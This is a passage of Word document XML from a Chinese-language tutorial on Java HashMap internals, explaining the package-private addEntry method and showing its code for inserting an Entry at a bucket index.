      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>   }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2346B" w:rsidRPr="00F41A4C" w:rsidRDefault="00D2346B" w:rsidP="00D2346B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>
        <w:ind w:firstLine="360"/>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当然最多的情况还是，桶后面的链表没有与当前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相同的，那么这个时候就需要调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法，将要加入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key-value</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>放入到当前的结构中了，那么接下来来看看这个方法的定义吧：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8317" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:bottom w:val="single" w:sz="24" w:space="0" w:color="999999"/>
          <w:right w:val="single" w:sz="24" w:space="0" w:color="999999"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8317"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D2346B" w:rsidRPr="00F41A4C" w:rsidTr="00FF5447">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DDDDDD"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>上面程序中还调用了</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>addEntry(hash, key, value, i);</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>代码，其中</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>addEntry</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>提供的一个包访问权限的方法，该方法仅用于添加一个</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>key-value</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>对。下面是该方法的代码：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void addEntry(int hash, K key, V value, int bucketIndex)   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>{   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    // </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>获取指定</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> bucketIndex </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>索引处的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> Entry   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    Entry&lt;K,V&gt; e = table[bucketIndex];     // </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>①</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    // </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>将新创建的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> Entry </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>放入</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> bucketIndex </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>索引处，并让新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> Entry </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>指向原来的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> Entry   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    table[bucketIndex] = new Entry&lt;K,V&gt;(hash, key, value, e);   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    // </w:t>
            </w:r>
